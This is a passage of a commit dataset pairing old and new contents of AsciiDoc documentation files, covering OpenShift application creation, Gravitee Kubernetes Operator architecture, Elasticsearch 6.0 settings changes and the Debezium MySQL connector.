default values for the other parameters, such as the success and failure thresholds for the probe, number of seconds before performing the first probe after the container starts, frequency of the probe, and the timeout value.\n\nBuild Configuration and Deployment::\nClick the *Build Configuration* and *Deployment* links to see the respective configuration options. 
Some options are selected by default; you can customize them further by adding the necessary triggers and environment variables.\n+\nFor serverless applications, the *Deployment* option is not displayed as the Knative configuration resource maintains the desired state for your deployment instead of a `DeploymentConfig` resource.\n\ninclude::snippets\/scaling-odc.adoc[]\n\nResource Limit::\nClick the *Resource Limit* link to set the amount of *CPU* and *Memory* resources a container is guaranteed or allowed to use when running.\n\nLabels::\nClick the *Labels* link to add custom labels to your application.\n\n. Click *Create* to create the application and see its build status in the *Topology* view.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"771b4267a2388b3fb40141cae402d902fa5cb121","subject":"Updated multi-cluster architecture scenario as per feedback","message":"Updated multi-cluster architecture scenario as per feedback\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-architecture.adoc","new_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-architecture.adoc","new_contents":"[[apim-kubernetes-operator-architecture]]\n= GKO Architecture\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_kubernetes_operator_architecture.html\n:page-folder: apim\/kubernetes\n:page-layout: apim3x\n\n== About Gravitee Kubernetes Operators\n\nA link:https:\/\/kubernetes.io\/docs\/concepts\/extend-kubernetes\/operator\/[Kubernetes operator^] is a method of packaging, deploying, and managing a Kubernetes application. A Kubernetes application is both deployed on Kubernetes and managed using the Kubernetes API and `kubectl` tooling.\n\nIn this context, a Kubernetes operator is an application-specific controller that extends the functionality of the Kubernetes API to create, configure, and manage application instances.\n\n== Architecture overview\n\nThe current functionality of the Gravitee Kubernetes Operator (GKO) allows for three main deployment scenarios, as described below.\n\nNOTE: To learn how to deploy GKO on a production cluster, see the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_installation_cluster.html' | relative_url }}[production deployment] section.\n\n=== Standard deployment\n\nIn the standard deployment scenario, the Management API and the API Gateway are deployed in the same Kubernetes cluster.\n\nWith this workflow, the GKO listens for link:{{ '\/apim\/3.x\/apim_kubernetes_operator_definitions.html' | relative_url }}[Custom Resource Definitions (CRDs)] and for each custom resource, a link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[ConfigMap^] is created and the API is pushed to the Management API using the import endpoint.\n\nThe API Gateway uses the link:https:\/\/github.com\/gravitee-io\/gravitee-kubernetes\/tree\/master\/gravitee-kubernetes-client[Kubernetes Client^] to listen for `ConfigMap`s (with a custom label), and deploys the APIs accordingly.\n\nThe following diagram illustrates the standard deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-1-standard.png %}[]\n\n=== Deployment on multiple clusters\n\nIn this scenario, the assumption is that both of the following requirements should be met:\n\n1. The user manages multiple Kubernetes clusters with a different set of APIs for each cluster.\n2. 
All APIs are managed using a single API Console.\n\nTo make this work with GKO, it should be installed on all the required clusters.\n\nThe following diagram illustrates the multi-cluster deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-2-multi-cluster.png %}[]\n\n=== Deployment on multiple environments\n\nIn this scenario, a single GKO is deployed that can publish APIs to different environments (logical or physical). This is managed directly from the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_api_definition.html' | relative_url }}[API Definition] custom resource, which refers to a link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_management_context.html' | relative_url }}[Management Context] custom resource.\n\nThe following diagram illustrates the multi-environment deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-3-multi-env.png %}[]\n","old_contents":"[[apim-kubernetes-operator-architecture]]\n= GKO Architecture\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_kubernetes_operator_architecture.html\n:page-folder: apim\/kubernetes\n:page-layout: apim3x\n\n== About Gravitee Kubernetes Operators\n\nA link:https:\/\/kubernetes.io\/docs\/concepts\/extend-kubernetes\/operator\/[Kubernetes operator^] is a method of packaging, deploying, and managing a Kubernetes application. A Kubernetes application is both deployed on Kubernetes and managed using the Kubernetes API and `kubectl` tooling.\n\nIn this context, a Kubernetes operator is an application-specific controller that extends the functionality of the Kubernetes API to create, configure, and manage application instances.\n\n== Architecture overview\n\nThe current functionality of the Gravitee Kubernetes Operator (GKO) allows for three main deployment scenarios, as described below.\n\nNOTE: To learn how to deploy GKO on a production cluster, see the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_installation_cluster.html' | relative_url }}[production deployment] section. \n\n=== Standard deployment\n\nIn the standard deployment scenario, the Management API and the API Gateway are deployed in the same Kubernetes cluster.\n\nWith this workflow, the GKO listens for link:{{ '\/apim\/3.x\/apim_kubernetes_operator_definitions.html' | relative_url }}[Custom Resource Definitions (CRDs] and for each custom resource, a link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[ConfigMap^] is created and the API is pushed to the Management API using the import endpoint.\n\nThe API Gateway uses the link:https:\/\/github.com\/gravitee-io\/gravitee-kubernetes\/tree\/master\/gravitee-kubernetes-client[Kubernetes Client^] to listen for `ConfigMap`s (with a custom label), and deploys the APIs accordingly.\n\nThe following diagram illustrates the standard deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-1-standard.png %}[]\n\n=== Deployment on multiple clusters\n\nIn this scenario, the assimption is that the user manages multiple Kubernetes clusters with a different set of APIs for each cluster. 
To make this work with GKO, it should be installed on all the required clusters.\n\nThe following diagram illustrates the multi-cluster deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-2-multi-cluster.png %}[]\n\n=== Deployment on multiple environments\n\nIn this scenario, a single GKO is deployed that can publish APIs to different environments (logical or physical). This is managed directly from the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_api_definition.html' | relative_url }}[API Definition] custom resource, which refers a link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_management_context.html' | relative_url }}[Management Context] custom resource.\n\nThe following diagram illustrates the multi-environment deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-3-multi-env.png %}[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fcd871a450107747f931980256487876af26729","subject":"Wrong discovery.type for azure in breaking changes (#32432)","message":"Wrong discovery.type for azure in breaking changes (#32432)\n\nShould be `azure` instead of `aws`.","repos":"strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. 
As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `azure` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n","old_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. 
As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `aws` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f9904dd8854f3e44eb2b52db892f7eb0b4d8633","subject":"DBZ-2127 A few more updates after testing split files downstream","message":"DBZ-2127 A few more updates after testing split files downstream\n","repos":"debezium\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/mysql.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/mysql.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n:context: debezium\n\n[id=\"debezium-connector-for-mysql\"]\n= {prodname} connector for MySQL\n\nMySQL has a binary log (binlog) that records all operations in the order in which they are committed to the database. This includes changes to table schemas as well as changes to the data in tables. MySQL uses the binlog for replication and recovery.\n\nThe {prodname} MySQL connector reads the binlog, produces change events for row-level `INSERT`, `UPDATE`, and `DELETE` operations, and emits the change events to Kafka topics. Client applications read those Kafka topics.\n\nAs MySQL is typically set up to purge binlogs after a specified period of time, the MySQL connector performs an initial _consistent snapshot_ of each of your databases. 
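\n\nFor illustration only, an abbreviated connector configuration might look like the following sketch. The connection values shown here are hypothetical, and required properties that are introduced later in this document, such as the database history settings, are omitted:\n\n[source,json]\n----\n{\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\",\n \"database.hostname\": \"mysql.example.com\", \/\/ hypothetical host\n \"database.port\": \"3306\",\n \"database.user\": \"debezium\",\n \"database.password\": \"dbz\",\n \"database.server.id\": \"184054\",\n \"database.server.name\": \"fulfillment\",\n \"snapshot.mode\": \"initial\" \/\/ the default mode; alternatives are described later\n}\n----\n\n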
The MySQL connector reads the binlog from the point at which the snapshot was made.\n\nifdef::product[]\nInformation and procedures for using a {prodname} MySQL connector are organized as follows:\n\n* xref:how-debezium-mysql-connectors-work[]\n* xref:descriptions-of-debezium-mysql-connector-data-change-events[]\n* xref:how-debezium-mysql-connectors-map-data-types[]\n* xref:setting-up-mysql-to-run-a-debezium-connector[]\n* xref:deploying-debezium-mysql-connectors[]\n* xref:monitoring-debezium-mysql-connector-performance[]\n* xref:how-debezium-mysql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mysql-connectors-work\n\/\/ Title: How {prodname} MySQL connectors work\n[[how-the-mysql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} MySQL connector, it is helpful to understand how the connector tracks the structure of tables, exposes schema changes, performs snapshots, and determines Kafka topic names. An overview of the MySQL topologies that the connector supports is useful for planning your application. \n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-mysql-connectors-handle-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-expose-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-perform-database-snapshots[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records[]\n* xref:mysql-topologies-supported-by-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors handle database schema changes\n[[mysql-schema-history-topic]]\n=== Schema history topic\n\nWhen a database client queries a database, the client uses the database\u2019s current schema. However, the database schema can be changed at any time, which means that the connector must be able to identify what the schema was at the time each insert, update, or delete operation was recorded. Also, a connector cannot just use the current schema because the connector might be processing events that are relatively old and may have been recorded before the tables' schemas were changed. \n\nTo handle this, MySQL includes in the binlog not only the row-level changes to the data, but also the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table\u2019s schema. The connector uses this schema representation to identify the structure of the tables at the time of each insert, update, or delete operation and to produce the appropriate change event. In a separate database history Kafka topic, the connector records all DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector starts reading the binlog from a specific position, that is, from a specific point in time. The connector rebuilds the table structures that existed at this point in time by reading the database history Kafka topic and parsing all DDL statements up to the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only. 
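\n\nThe name of this topic is set with the `database.history.kafka.topic` connector property. The following fragment of a connector configuration is for illustration only; the broker address and topic name are hypothetical:\n\n[source,json]\n----\n{\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ hypothetical broker\n \"database.history.kafka.topic\": \"dbhistory.fulfillment\"\n}\n----\n\n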
The connector can optionally {link-prefix}:{link-mysql-connector}#mysql-schema-change-topic[emit schema change events to a different topic that is intended for consumer applications].\n\nWhen the MySQL connector captures changes in a table to which a schema change tool such as `gh-ost` or `pt-online-schema-change` is applied, there are helper tables created during the migration process. The connector needs to be configured to capture changes to these helper tables. If consumers do not need the records generated for helper tables, then a simple message transform can be applied to filter them out.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-topic-names[default names for topics] that receive {prodname} event records.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-expose-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors expose database schema changes\n[id=\"mysql-schema-change-topic\"]\n=== Schema change topic\n\nYou can configure a {prodname} MySQL connector to produce schema change events that include all DDL statements applied to databases in the MySQL server. The connector emits these events to a Kafka topic named _serverName_ where _serverName_ is the name of the connector as specified by the `database.server.name` connector configuration property.\n\nIf you choose to use _schema change events_, ensure that you consume records from the schema change topic. The database history topic is for connector use only. \n\nIMPORTANT: A global order for events emitted to the schema change topic is vital. Therefore, you must not partition the database history topic. This means that you must specify a partition count of `1` when creating the database history topic. When relying on auto topic creation, make sure that Kafka\u2019s `num.partitions` configuration option, which specifies the default number of partitions, is set to `1`.\n\nEach record that the connector emits to the schema change topic contains a message key that includes the name of the connected database when the DDL statement was applied, for example: \n\n[source,json,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n}\n----\n\nThe schema change event record value contains a structure that includes the DDL statements, the name of the database to which the statements were applied, and the position in the binlog where the statements appeared, for example: \n\n[source,json,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n 
},\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n}\n----\n\nThe `ddl` field might contain multiple DDL statements. Each statement applies to the database in the `databaseName` field. The statements appear in the order in which they were applied to the database. The `source` field is structured exactly as a standard data change event written to table-specific topics. This field is useful to correlate events on different topics.\n\n[source,json,subs=\"+attributes\"]\n----\n....\n\"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,...)\",\n \"source\" : {\n ...\n }\n}\n....\n----\n\nA client can submit multiple DDL statements to be applied to multiple databases. If MySQL applies them atomically, the connector takes the DDL statements in order, groups them by database, and creates a schema change event for each group. If MySQL applies them individually, the connector creates a separate schema change event for each statement.\n\nSee also: {link-prefix}:{link-mysql-connector}#mysql-schema-history-topic[schema history topic].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} MySQL connectors perform database snapshots\n[[mysql-snapshots]]\n=== Snapshots\n\nWhen a {prodname} MySQL connector is first started, it performs an initial _consistent snapshot_ of your database. The following flow describes how the connector creates this snapshot. This flow is for the default snapshot mode, which is `initial`. For information about other snapshot modes, see the {link-prefix}:{link-mysql-connector}#mysql-property-snapshot-mode[MySQL connector `snapshot.mode` configuration property].\n\n.Workflow for performing an initial snapshot with a global read lock\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\na| Grabs a global read lock that blocks _writes_ by other database clients. +\n + \nThe snapshot itself does not prevent other clients from applying DDL that might interfere with the connector's attempt to read the binlog position and table schemas. 
The connector keeps the global read lock while it reads the binlog position, and releases the lock as described in a later step.\n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\na|Reads the current binlog position.\n\n|4\na|Reads the schema of the databases and tables for which the connector is configured to capture changes.\n\n|5\na|Releases the global read lock. Other database clients can now write to the database.\n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements. \n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\na|Records the completed snapshot in the connector offsets.\n\n|===\n\nConnector restarts::\nIf the connector fails, stops, or is rebalanced while performing the _initial snapshot_, then after the connector restarts, it performs a new snapshot. After that _initial snapshot_ is completed, the {prodname} MySQL connector restarts from the same position in the binlog so it does not miss any updates.\n+\nIf the connector stops for long enough, MySQL could purge old binlog files and the connector's position would be lost. If the position is lost, the connector reverts to the _initial snapshot_ for its starting position. For more tips on troubleshooting the {prodname} MySQL connector, see {link-prefix}:{link-mysql-connector}#mysql-when-things-go-wrong[behavior when things go wrong].\n\nGlobal read locks not allowed::\nSome environments do not allow global read locks. If the {prodname} MySQL connector detects that global read locks are not permitted, the connector uses table-level locks instead and performs a snapshot with this method. This requires the database user for the {prodname} connector to have `LOCK_TABLES` privileges. \n+\n.Workflow for performing an initial snapshot with table-level locks\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\n|Obtains table-level locks. \n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\n|Reads and filters the names of the databases and tables.\n\n|4\na|Reads the current binlog position.\n\n|5\na|Reads the schema of the databases and tables for which the connector is configured to capture changes. \n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements.\n\n|7\na|Scans the database tables. 
For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\n|Releases the table-level locks.\n\n|10\na|Records the completed snapshot in the connector offsets.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MySQL change event records\n[[mysql-topic-names]]\n=== Topic names\n\nThe default behavior is that a {prodname} MySQL connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations in one table to one Kafka topic. The Kafka topic naming convention is as follows:\n\n_serverName.databaseName.tableName_\n\nSuppose that `fulfillment` is the server name, `inventory` is the database name, and the database contains tables named `orders`, `customers`, and `products`. The {prodname} MySQL connector emits events to three Kafka topics, one for each table in the database:\n\n----\nfulfillment.inventory.orders\nfulfillment.inventory.customers\nfulfillment.inventory.products\n----\n\n\/\/ Type: concept\n\/\/ ModuleID: mysql-topologies-supported-by-debezium-connectors\n\/\/ Title: MySQL topologies supported by {prodname} connectors\n[id=\"supported-mysql-topologies\"]\n=== Supported MySQL topologies\n\nThe {prodname} MySQL connector supports the following MySQL topologies:\n\nStandalone::\nWhen a single MySQL server is used, the server must have the binlog enabled (_and optionally GTIDs enabled_) so the {prodname} MySQL connector can monitor the server. This is often acceptable, since the binary log can also be used as an incremental link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/backup-methods.html[backup]. In this case, the MySQL connector always connects to and follows this standalone MySQL server instance.\n\nPrimary and replica::\nThe {prodname} MySQL connector can follow one of the primary servers or one of the replicas (_if that replica has its binlog enabled_), but the connector sees changes in only the cluster that is visible to that server. Generally, this is not a problem except for the multi-primary topologies.\n+\nThe connector records its position in the server\u2019s binlog, which is different on each server in the cluster. Therefore, the connector must follow just one MySQL server instance. If that server fails, that server must be restarted or recovered before the connector can continue.\n\nHighly available clusters::\nA variety of link:https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[high availability] solutions exist for MySQL, and they make it significantly easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that replicas are able to keep track of all changes on any of the primary servers.\n\nMulti-primary::\nlink:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/mysql-cluster-replication-multi-source.html[Network Database (NDB) cluster replication] uses one or more MySQL replica nodes that each replicate from multiple primary servers. This is a powerful way to aggregate the replication of multiple MySQL clusters. This topology requires the use of GTIDs.\n+\nA {prodname} MySQL connector can use these multi-primary MySQL replicas as sources, and can fail over to different multi-primary MySQL replicas as long as the new replica is caught up to the old replica. That is, the new replica has all transactions that were seen on the first replica. 
This works even if the connector is using only a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-primary MySQL replica and find the correct position in the binlog.\n\nHosted::\nThere is support for the {prodname} MySQL connector to use hosted options such as Amazon RDS and Amazon Aurora.\n+\nBecause these hosted options do not allow a global read lock, table-level locks are used to create the _consistent snapshot_.\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MySQL connector data change events\n[[mysql-events]]\n== Data change events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce them. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-mysql-connector}#mysql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. 